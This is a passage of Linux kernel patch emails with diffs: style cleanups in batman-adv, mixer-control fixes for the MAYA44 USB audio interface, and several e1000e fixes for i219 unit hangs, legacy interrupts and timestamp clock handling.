1 : 0; + direct_link = !!(batadv_ogm_packet->flags & BATADV_DIRECTLINK); max_aggregation_jiffies = msecs_to_jiffies(BATADV_MAX_AGGREGATION_MS); /* find position for the packet in the forward queue */ spin_lock_bh(&bat_priv->forw_bat_list_lock); /* own packets are not to be aggregated */ - if ((atomic_read(&bat_priv->aggregated_ogms)) && (!own_packet)) { + if (atomic_read(&bat_priv->aggregated_ogms) && !own_packet) { hlist_for_each_entry(forw_packet_pos, &bat_priv->forw_bat_list, list) { if (batadv_iv_ogm_can_aggregate(batadv_ogm_packet, From 23badd6dbe5ed66668b0084950c5f66062923e10 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:33 +0100 Subject: [PATCH 640/872] batman-adv: iv_ogm_orig_update, style, add missing brackets CodingStyle describes that either none or both branches of a conditional have to have brackets. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 159f30af1dc3..66ac9e85d1ce 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1032,9 +1032,10 @@ batadv_iv_ogm_orig_update(struct batadv_priv *bat_priv, batadv_orig_node_free_ref(orig_tmp); if (!neigh_node) goto unlock; - } else + } else { batadv_dbg(BATADV_DBG_BATMAN, bat_priv, "Updating existing last-hop neighbor of originator\n"); + } rcu_read_unlock(); neigh_ifinfo = batadv_neigh_ifinfo_new(neigh_node, if_outgoing); From 9f52ee19c3c73763138ccc307858d9877242c0ad Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:34 +0100 Subject: [PATCH 641/872] batman-adv: iv_ogm, Fix dup_status comment Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 66ac9e85d1ce..23c41d17d999 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -28,7 +28,7 @@ /** * enum batadv_dup_status - duplicate status - * @BATADV_NO_DUP: the packet is a duplicate + * @BATADV_NO_DUP: the packet is no duplicate * @BATADV_ORIG_DUP: OGM is a duplicate in the originator (but not for the * neighbor) * @BATADV_NEIGH_DUP: OGM is a duplicate for the neighbor From 6c4a1622e21fde1a0287ada3bedcbf75ddbc80ac Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:35 +0100 Subject: [PATCH 642/872] batman-adv: iv_ogm, fix coding style The kernel coding style says, that there should not be multiple assignments in one row. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 23c41d17d999..0019f1bfbe8b 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -64,7 +64,9 @@ static void batadv_ring_buffer_set(uint8_t lq_recv[], uint8_t *lq_index, static uint8_t batadv_ring_buffer_avg(const uint8_t lq_recv[]) { const uint8_t *ptr; - uint16_t count = 0, i = 0, sum = 0; + uint16_t count = 0; + uint16_t i = 0; + uint16_t sum = 0; ptr = lq_recv; From d491dbb68b6efd12a27ee10791e27fc5f2bd02ff Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:36 +0100 Subject: [PATCH 643/872] batman-adv: iv_ogm, fix comment function name This is a small copy paste fix for batadv_ing_buffer_avg. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 0019f1bfbe8b..9f83137a6514 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -55,7 +55,7 @@ static void batadv_ring_buffer_set(uint8_t lq_recv[], uint8_t *lq_index, } /** - * batadv_ring_buffer_set - compute the average of all non-zero values stored + * batadv_ring_buffer_avg - compute the average of all non-zero values stored * in the given ring buffer * @lq_recv: pointer to the ring buffer * From 044bddb9ca8d49edb91bc22b9940a463b0dbb97f Mon Sep 17 00:00:00 2001 From: Clemens Ladisch Date: Wed, 3 Jun 2015 11:36:42 +0200 Subject: [PATCH 644/872] ALSA: usb-audio: add MAYA44 USB+ mixer control names Add mixer control names for the ESI Maya44 USB+ (which appears to be identical width the AudioTrak Maya44 USB). Reported-by: nightmixes Signed-off-by: Clemens Ladisch Cc: Signed-off-by: Takashi Iwai --- sound/usb/mixer_maps.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/sound/usb/mixer_maps.c b/sound/usb/mixer_maps.c index b703cb3cda19..e5000da9e9d7 100644 --- a/sound/usb/mixer_maps.c +++ b/sound/usb/mixer_maps.c @@ -436,6 +436,11 @@ static struct usbmix_ctl_map usbmix_ctl_maps[] = { .id = USB_ID(0x200c, 0x1018), .map = ebox44_map, }, + { + /* MAYA44 USB+ */ + .id = USB_ID(0x2573, 0x0008), + .map = maya44_map, + }, { /* KEF X300A */ .id = USB_ID(0x27ac, 0x1000), From ea114fc27dc0cb9a550b6add5426720feb66262a Mon Sep 17 00:00:00 2001 From: Clemens Ladisch Date: Wed, 3 Jun 2015 11:36:51 +0200 Subject: [PATCH 645/872] ALSA: usb-audio: fix missing input volume controls in MAYA44 USB(+) The driver worked around an error in the MAYA44 USB(+)'s mixer unit descriptor by aborting before parsing the missing field. However, aborting parsing too early prevented parsing of the other units connected to this unit, so the capture mixer controls would be missing. Fix this by moving the check for this descriptor error after the parsing of the unit's input pins. Reported-by: nightmixes Tested-by: nightmixes Signed-off-by: Clemens Ladisch Cc: Signed-off-by: Takashi Iwai --- sound/usb/mixer.c | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c index 4256fdedbd80..8b7e391dd0b8 100644 --- a/sound/usb/mixer.c +++ b/sound/usb/mixer.c @@ -1583,12 +1583,6 @@ static int parse_audio_mixer_unit(struct mixer_build *state, int unitid, unitid); return -EINVAL; } - /* no bmControls field (e.g. Maya44) -> ignore */ - if (desc->bLength <= 10 + input_pins) { - usb_audio_dbg(state->chip, "MU %d has no bmControls field\n", - unitid); - return 0; - } num_ins = 0; ich = 0; @@ -1596,6 +1590,9 @@ static int parse_audio_mixer_unit(struct mixer_build *state, int unitid, err = parse_audio_unit(state, desc->baSourceID[pin]); if (err < 0) continue; + /* no bmControls field (e.g. Maya44) -> ignore */ + if (desc->bLength <= 10 + input_pins) + continue; err = check_input_term(state, desc->baSourceID[pin], &iterm); if (err < 0) return err; From ad851fbb73a3d6564707281aa253418ef6aab878 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 14 Apr 2015 02:20:21 +0300 Subject: [PATCH 646/872] e1000e: i219 fix unit hang on reset and runtime D3 Unit hang may occur if multiple descriptors are available in the rings during reset or runtime suspend. This state can be detected by testing bit 8 in the FEXTNVM7 register. If this bit is set and there are pending descriptors in one of the rings, we must flush them prior to reset. Same applies entering runtime suspend. Signed-off-by: Yanir Lubetkin Reviewed-by: Alexander Duyck Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ich8lan.h | 5 + drivers/net/ethernet/intel/e1000e/netdev.c | 102 ++++++++++++++++++++ drivers/net/ethernet/intel/e1000e/regs.h | 1 + 3 files changed, 108 insertions(+) diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index 770a573b9eea..bf72ef809df8 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -100,6 +100,11 @@ #define E1000_FEXTNVM7_DISABLE_PB_READ 0x00040000 #define E1000_FEXTNVM7_DISABLE_SMB_PERST 0x00000020 +#define E1000_FEXTNVM7_NEED_DESCRING_FLUSH 0x00000100 +#define E1000_FEXTNVM11_DISABLE_MULR_FIX 0x00002000 + +/* bit24: RXDCTL thresholds granularity: 0 - cache lines, 1 - descriptors */ +#define E1000_RXDCTL_THRESH_UNIT_DESC 0x01000000 #define K1_ENTRY_LATENCY 0 #define K1_MIN_TIME 1 diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 7dd2c11c3f61..76b1a9077fe1 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3787,6 +3787,106 @@ static void e1000_power_down_phy(struct e1000_adapter *adapter) adapter->hw.phy.ops.power_down(&adapter->hw); } +/** + * e1000_flush_tx_ring - remove all descriptors from the tx_ring + * + * We want to clear all pending descriptors from the TX ring. + * zeroing happens when the HW reads the regs. We assign the ring itself as + * the data of the next descriptor. We don't care about the data we are about + * to reset the HW. + */ +static void e1000_flush_tx_ring(struct e1000_adapter *adapter) +{ + struct e1000_hw *hw = &adapter->hw; + struct e1000_ring *tx_ring = adapter->tx_ring; + struct e1000_tx_desc *tx_desc = NULL; + u32 tdt, tctl, txd_lower = E1000_TXD_CMD_IFCS; + u16 size = 512; + + tctl = er32(TCTL); + ew32(TCTL, tctl | E1000_TCTL_EN); + tdt = er32(TDT(0)); + BUG_ON(tdt != tx_ring->next_to_use); + tx_desc = E1000_TX_DESC(*tx_ring, tx_ring->next_to_use); + tx_desc->buffer_addr = tx_ring->dma; + + tx_desc->lower.data = cpu_to_le32(txd_lower | size); + tx_desc->upper.data = 0; + /* flush descriptors to memory before notifying the HW */ + wmb(); + tx_ring->next_to_use++; + if (tx_ring->next_to_use == tx_ring->count) + tx_ring->next_to_use = 0; + ew32(TDT(0), tx_ring->next_to_use); + mmiowb(); + usleep_range(200, 250); +} + +/** + * e1000_flush_rx_ring - remove all descriptors from the rx_ring + * + * Mark all descriptors in the RX ring as consumed and disable the rx ring + */ +static void e1000_flush_rx_ring(struct e1000_adapter *adapter) +{ + u32 rctl, rxdctl; + struct e1000_hw *hw = &adapter->hw; + + rctl = er32(RCTL); + ew32(RCTL, rctl & ~E1000_RCTL_EN); + e1e_flush(); + usleep_range(100, 150); + + rxdctl = er32(RXDCTL(0)); + /* zero the lower 14 bits (prefetch and host thresholds) */ + rxdctl &= 0xffffc000; + + /* update thresholds: prefetch threshold to 31, host threshold to 1 + * and make sure the granularity is "descriptors" and not "cache lines" + */ + rxdctl |= (0x1F | (1 << 8) | E1000_RXDCTL_THRESH_UNIT_DESC); + + ew32(RXDCTL(0), rxdctl); + /* momentarily enable the RX ring for the changes to take effect */ + ew32(RCTL, rctl | E1000_RCTL_EN); + e1e_flush(); + usleep_range(100, 150); + ew32(RCTL, rctl & ~E1000_RCTL_EN); +} + +/** + * e1000_flush_desc_rings - remove all descriptors from the descriptor rings + * + * In i219, the descriptor rings must be emptied before resetting the HW + * or before changing the device state to D3 during runtime (runtime PM). + * + * Failure to do this will cause the HW to enter a unit hang state which can + * only be released by PCI reset on the device + * + */ + +static void e1000_flush_desc_rings(struct e1000_adapter *adapter) +{ + u32 hang_state; + u32 fext_nvm11, tdlen; + struct e1000_hw *hw = &adapter->hw; + + /* First, disable MULR fix in FEXTNVM11 */ + fext_nvm11 = er32(FEXTNVM11); + fext_nvm11 |= E1000_FEXTNVM11_DISABLE_MULR_FIX; + ew32(FEXTNVM11, fext_nvm11); + /* do nothing if we're not in faulty state, or if the queue is empty */ + tdlen = er32(TDLEN(0)); + hang_state = er32(FEXTNVM7); + if ((hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || tdlen) + return; + e1000_flush_tx_ring(adapter); + /* recheck, maybe the fault is caused by the rx ring */ + hang_state = er32(FEXTNVM7); + if (hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) + e1000_flush_rx_ring(adapter); +} + /** * e1000e_reset - bring the hardware into a known good state * @@ -4115,6 +4215,8 @@ void e1000e_down(struct e1000_adapter *adapter, bool reset) spin_unlock(&adapter->stats64_lock); e1000e_flush_descriptors(adapter); + if (hw->mac.type == e1000_pch_spt) + e1000_flush_desc_rings(adapter); e1000_clean_tx_ring(adapter->tx_ring); e1000_clean_rx_ring(adapter->rx_ring); diff --git a/drivers/net/ethernet/intel/e1000e/regs.h b/drivers/net/ethernet/intel/e1000e/regs.h index 85eefc4832ba..200a3126beed 100644 --- a/drivers/net/ethernet/intel/e1000e/regs.h +++ b/drivers/net/ethernet/intel/e1000e/regs.h @@ -38,6 +38,7 @@ #define E1000_FEXTNVM4 0x00024 /* Future Extended NVM 4 - RW */ #define E1000_FEXTNVM6 0x00010 /* Future Extended NVM 6 - RW */ #define E1000_FEXTNVM7 0x000E4 /* Future Extended NVM 7 - RW */ +#define E1000_FEXTNVM11 0x5BBC /* Future Extended NVM 11 - RW */ #define E1000_PCIEANACFG 0x00F18 /* PCIE Analog Config */ #define E1000_FCT 0x00030 /* Flow Control Type - RW */ #define E1000_VET 0x00038 /* VLAN Ether Type - RW */ From 0ffc56464bbbb8e2a78e319a36e1eafcbaaab9d8 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Wed, 22 Apr 2015 04:15:01 +0300 Subject: [PATCH 647/872] e1000e: i219 execute unit hang fix on every reset or power state transition After testing various cases, the conclusion is that the fix MUST be executed BEFORE any event that the HW is reset or transition to D3. To fix that I moved the execution to the relevant places but per Alexander Duyck's review, ensure now that the DMA is valid and was not freed before manipulating the ring. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/netdev.c | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 76b1a9077fe1..14ee6a67ee73 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -4043,6 +4043,8 @@ void e1000e_reset(struct e1000_adapter *adapter) } } + if (hw->mac.type == e1000_pch_spt) + e1000_flush_desc_rings(adapter); /* Allow time for pending master requests to run */ mac->ops.reset_hw(hw); @@ -4215,10 +4217,6 @@ void e1000e_down(struct e1000_adapter *adapter, bool reset) spin_unlock(&adapter->stats64_lock); e1000e_flush_descriptors(adapter); - if (hw->mac.type == e1000_pch_spt) - e1000_flush_desc_rings(adapter); - e1000_clean_tx_ring(adapter->tx_ring); - e1000_clean_rx_ring(adapter->rx_ring); adapter->link_speed = 0; adapter->link_duplex = 0; @@ -4229,8 +4227,14 @@ void e1000e_down(struct e1000_adapter *adapter, bool reset) e1000_lv_jumbo_workaround_ich8lan(hw, false)) e_dbg("failed to disable jumbo frame workaround mode\n"); - if (reset && !pci_channel_offline(adapter->pdev)) - e1000e_reset(adapter); + if (!pci_channel_offline(adapter->pdev)) { + if (reset) + e1000e_reset(adapter); + else if (hw->mac.type == e1000_pch_spt) + e1000_flush_desc_rings(adapter); + } + e1000_clean_tx_ring(adapter->tx_ring); + e1000_clean_rx_ring(adapter->rx_ring); } void e1000e_reinit_locked(struct e1000_adapter *adapter) From bfc9473bf90457bf31d3f675d82234897c6480cd Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Wed, 22 Apr 2015 05:55:43 +0300 Subject: [PATCH 648/872] e1000e: remove call to do_div and sign mismatch warning Fixes a warning that was reported by Yanjiang Jin by implementing the solution suggested by Alexander Duyck . Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ich8lan.c | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.c b/drivers/net/ethernet/intel/e1000e/ich8lan.c index e18443a00bdb..d9f7b934b516 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.c +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.c @@ -1014,7 +1014,6 @@ static s32 e1000_platform_pm_pch_lpt(struct e1000_hw *hw, bool link) u16 speed, duplex, scale = 0; u16 max_snoop, max_nosnoop; u16 max_ltr_enc; /* max LTR latency encoded */ - s64 lat_ns; /* latency (ns) */ u64 value; u32 rxa; @@ -1040,14 +1039,10 @@ static s32 e1000_platform_pm_pch_lpt(struct e1000_hw *hw, bool link) * 2^25*(2^10-1) ns. The scale is encoded as 0=2^0ns, * 1=2^5ns, 2=2^10ns,...5=2^25ns. */ - lat_ns = ((s64)rxa * 1024 - - (2 * (s64)hw->adapter->max_frame_size)) * 8 * 1000; - if (lat_ns < 0) { - value = 0; - } else { - value = lat_ns; - do_div(value, speed); - } + rxa *= 512; + value = (rxa > hw->adapter->max_frame_size) ? + (rxa - hw->adapter->max_frame_size) * (16000 / speed) : + 0; while (value > PCI_LTR_VALUE_MASK) { scale++; From 95f0d950467f1228d4e326c11150e1750a6dd1ef Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Wed, 22 Apr 2015 19:25:17 +0300 Subject: [PATCH 649/872] e1000e: fix logical error in flush_desc_rings The condition under which the flush should occur was reversed. The fix should be applied before any HW reset (unless followed by bus reset) and before any power state transition from D0. If E1000_FEXTNVM7_NEED_DESCRING_FLUSH bit is set in FEXTNVM7 and TDLEN > 0 the Tx ring should be flushed. (fixes ~95% of the hang states). If the E1000_FEXTNVM7_NEED_DESCRING_FLUSH did not clear, we should also flush the RX ring. Bug was caught by Alexander Duyck during a code review when examining this fix. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/netdev.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 14ee6a67ee73..b2d77a5c25c0 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3878,7 +3878,7 @@ static void e1000_flush_desc_rings(struct e1000_adapter *adapter) /* do nothing if we're not in faulty state, or if the queue is empty */ tdlen = er32(TDLEN(0)); hang_state = er32(FEXTNVM7); - if ((hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || tdlen) + if (!(hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || !tdlen) return; e1000_flush_tx_ring(adapter); /* recheck, maybe the fault is caused by the rx ring */ From ff9174291eddb3f42a1e9429f8b919bebc33533b Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:38 +0300 Subject: [PATCH 650/872] e1000e: fix flush_desc_ring implementation The indication that a descriptor ring flush is required was read from FEXTNVM7 by mistake. It should be read from the PCI config space. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/e1000.h | 2 ++ drivers/net/ethernet/intel/e1000e/ich8lan.h | 1 - drivers/net/ethernet/intel/e1000e/netdev.c | 12 +++++++----- 3 files changed, 9 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/e1000.h b/drivers/net/ethernet/intel/e1000e/e1000.h index 0abc942c966e..e78487ab18da 100644 --- a/drivers/net/ethernet/intel/e1000e/e1000.h +++ b/drivers/net/ethernet/intel/e1000e/e1000.h @@ -98,6 +98,8 @@ struct e1000_info; #define DEFAULT_RADV 8 #define BURST_RDTR 0x20 #define BURST_RADV 0x20 +#define PCICFG_DESC_RING_STATUS 0xe4 +#define FLUSH_DESC_REQUIRED 0x100 /* in the case of WTHRESH, it appears at least the 82571/2 hardware * writes back 4 descriptors when WTHRESH=5, and 3 descriptors when diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index bf72ef809df8..1500536a6748 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -100,7 +100,6 @@ #define E1000_FEXTNVM7_DISABLE_PB_READ 0x00040000 #define E1000_FEXTNVM7_DISABLE_SMB_PERST 0x00000020 -#define E1000_FEXTNVM7_NEED_DESCRING_FLUSH 0x00000100 #define E1000_FEXTNVM11_DISABLE_MULR_FIX 0x00002000 /* bit24: RXDCTL thresholds granularity: 0 - cache lines, 1 - descriptors */ diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index b2d77a5c25c0..4f029b6d0cf0 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3867,7 +3867,7 @@ static void e1000_flush_rx_ring(struct e1000_adapter *adapter) static void e1000_flush_desc_rings(struct e1000_adapter *adapter) { - u32 hang_state; + u16 hang_state; u32 fext_nvm11, tdlen; struct e1000_hw *hw = &adapter->hw; @@ -3877,13 +3877,15 @@ static void e1000_flush_desc_rings(struct e1000_adapter *adapter) ew32(FEXTNVM11, fext_nvm11); /* do nothing if we're not in faulty state, or if the queue is empty */ tdlen = er32(TDLEN(0)); - hang_state = er32(FEXTNVM7); - if (!(hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || !tdlen) + pci_read_config_word(adapter->pdev, PCICFG_DESC_RING_STATUS, + &hang_state); + if (!(hang_state & FLUSH_DESC_REQUIRED) || !tdlen) return; e1000_flush_tx_ring(adapter); /* recheck, maybe the fault is caused by the rx ring */ - hang_state = er32(FEXTNVM7); - if (hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) + pci_read_config_word(adapter->pdev, PCICFG_DESC_RING_STATUS, + &hang_state); + if (hang_state & FLUSH_DESC_REQUIRED) e1000_flush_rx_ring(adapter); } From ec945cfbbf918dd862d7574f9b75588ba1f4a729 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:42 +0300 Subject: [PATCH 651/872] e1000e: fix legacy interrupt handling in i219 This fix handles a hardware issue that prevented i219 from working in legacy interrupts mode (IntMode=0) Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ich8lan.h | 5 ++++- drivers/net/ethernet/intel/e1000e/netdev.c | 14 ++++++++++++++ drivers/net/ethernet/intel/e1000e/regs.h | 1 + 3 files changed, 19 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index 1500536a6748..193c445773fa 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -98,8 +98,11 @@ #define E1000_FEXTNVM6_K1_OFF_ENABLE 0x80000000 /* bit for disabling packet buffer read */ #define E1000_FEXTNVM7_DISABLE_PB_READ 0x00040000 - +#define E1000_FEXTNVM7_SIDE_CLK_UNGATE 0x00000004 #define E1000_FEXTNVM7_DISABLE_SMB_PERST 0x00000020 +#define E1000_FEXTNVM9_IOSFSB_CLKGATE_DIS 0x00000800 +#define E1000_FEXTNVM9_IOSFSB_CLKREQ_DIS 0x00001000 +#define E1000_FEXTNVM11_DISABLE_PB_READ 0x00000200 #define E1000_FEXTNVM11_DISABLE_MULR_FIX 0x00002000 /* bit24: RXDCTL thresholds granularity: 0 - cache lines, 1 - descriptors */ diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 4f029b6d0cf0..5f94fdf4af4e 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -4120,6 +4120,20 @@ void e1000e_reset(struct e1000_adapter *adapter) phy_data &= ~IGP02E1000_PM_SPD; e1e_wphy(hw, IGP02E1000_PHY_POWER_MGMT, phy_data); } + if (hw->mac.type == e1000_pch_spt && adapter->int_mode == 0) { + u32 reg; + + /* Fextnvm7 @ 0xe4[2] = 1 */ + reg = er32(FEXTNVM7); + reg |= E1000_FEXTNVM7_SIDE_CLK_UNGATE; + ew32(FEXTNVM7, reg); + /* Fextnvm9 @ 0x5bb4[13:12] = 11 */ + reg = er32(FEXTNVM9); + reg |= E1000_FEXTNVM9_IOSFSB_CLKGATE_DIS | + E1000_FEXTNVM9_IOSFSB_CLKREQ_DIS; + ew32(FEXTNVM9, reg); + } + } int e1000e_up(struct e1000_adapter *adapter) diff --git a/drivers/net/ethernet/intel/e1000e/regs.h b/drivers/net/ethernet/intel/e1000e/regs.h index 200a3126beed..110e27e35ff5 100644 --- a/drivers/net/ethernet/intel/e1000e/regs.h +++ b/drivers/net/ethernet/intel/e1000e/regs.h @@ -38,6 +38,7 @@ #define E1000_FEXTNVM4 0x00024 /* Future Extended NVM 4 - RW */ #define E1000_FEXTNVM6 0x00010 /* Future Extended NVM 6 - RW */ #define E1000_FEXTNVM7 0x000E4 /* Future Extended NVM 7 - RW */ +#define E1000_FEXTNVM9 0x5BB4 /* Future Extended NVM 9 - RW */ #define E1000_FEXTNVM11 0x5BBC /* Future Extended NVM 11 - RW */ #define E1000_PCIEANACFG 0x00F18 /* PCIE Analog Config */ #define E1000_FCT 0x00030 /* Flow Control Type - RW */ From 83129b37ef35bb6a7f01c060129736a8db5d31c4 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:45 +0300 Subject: [PATCH 652/872] e1000e: fix systim issues Two issues involving systim were reported. 1. Clock is not running in the correct frequency 2. In some situations, systim values were not incremented linearly This patch fixes the hardware clock configuration and the spurious non-linear increment. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/e1000.h | 4 +++ drivers/net/ethernet/intel/e1000e/netdev.c | 37 +++++++++++++++------- 2 files changed, 30 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/e1000.h b/drivers/net/ethernet/intel/e1000e/e1000.h index e78487ab18da..7d8a45c9a40c 100644 --- a/drivers/net/ethernet/intel/e1000e/e1000.h +++ b/drivers/net/ethernet/intel/e1000e/e1000.h @@ -386,6 +386,10 @@ s32 e1000e_get_base_timinca(struct e1000_adapter *adapter, u32 *timinca); #define INCVALUE_SHIFT_25MHz 18 #define INCPERIOD_25MHz 1 +#define INCVALUE_24MHz 125 +#define INCVALUE_SHIFT_24MHz 14 +#define INCPERIOD_24MHz 3 + /* Another drawback of scaling the incvalue by a large factor is the * 64-bit SYSTIM register overflows more quickly. This is dealt with * by simply reading the clock before it overflows. diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 5f94fdf4af4e..b7035bc79e76 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3525,22 +3525,30 @@ s32 e1000e_get_base_timinca(struct e1000_adapter *adapter, u32 *timinca) switch (hw->mac.type) { case e1000_pch2lan: case e1000_pch_lpt: - case e1000_pch_spt: - /* On I217, I218 and I219, the clock frequency is 25MHz - * or 96MHz as indicated by the System Clock Frequency - * Indication - */ - if (((hw->mac.type != e1000_pch_lpt) && - (hw->mac.type != e1000_pch_spt)) || - (er32(TSYNCRXCTL) & E1000_TSYNCRXCTL_SYSCFI)) { + if (er32(TSYNCRXCTL) & E1000_TSYNCRXCTL_SYSCFI) { /* Stable 96MHz frequency */ incperiod = INCPERIOD_96MHz; incvalue = INCVALUE_96MHz; shift = INCVALUE_SHIFT_96MHz; adapter->cc.shift = shift + INCPERIOD_SHIFT_96MHz; + } else { + /* Stable 25MHz frequency */ + incperiod = INCPERIOD_25MHz; + incvalue = INCVALUE_25MHz; + shift = INCVALUE_SHIFT_25MHz; + adapter->cc.shift = shift; + } + break; + case e1000_pch_spt: + if (er32(TSYNCRXCTL) & E1000_TSYNCRXCTL_SYSCFI) { + /* Stable 24MHz frequency */ + incperiod = INCPERIOD_24MHz; + incvalue = INCVALUE_24MHz; + shift = INCVALUE_SHIFT_24MHz; + adapter->cc.shift = shift; break; } - /* fall-through */ + return -EINVAL; case e1000_82574: case e1000_82583: /* Stable 25MHz frequency */ @@ -4273,9 +4281,16 @@ static cycle_t e1000e_cyclecounter_read(const struct cyclecounter *cc) cc); struct e1000_hw *hw = &adapter->hw; cycle_t systim, systim_next; + /* SYSTIMH latching upon SYSTIML read does not work well. To fix that + * we don't want to allow overflow of SYSTIML and a change to SYSTIMH + * to occur between reads, so if we read a vale close to overflow, we + * wait for overflow to occur and read both registers when its safe. + */ + u32 systim_overflow_latch_fix = 0x3FFFFFFF; - /* latch SYSTIMH on read of SYSTIML */ - systim = (cycle_t)er32(SYSTIML); + do { + systim = (cycle_t)er32(SYSTIML); + } while (systim > systim_overflow_latch_fix); systim |= (cycle_t)er32(SYSTIMH) << 32; if ((hw->mac.type == e1000_82574) || (hw->mac.type == e1000_82583)) { From 2ec7d2974c5665780e5f2b532833b76531f0a8d3 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:47 +0300 Subject: [PATCH 653/872] e1000e: fix unit hang during loopback test System would hang during execution of "ethtool -t 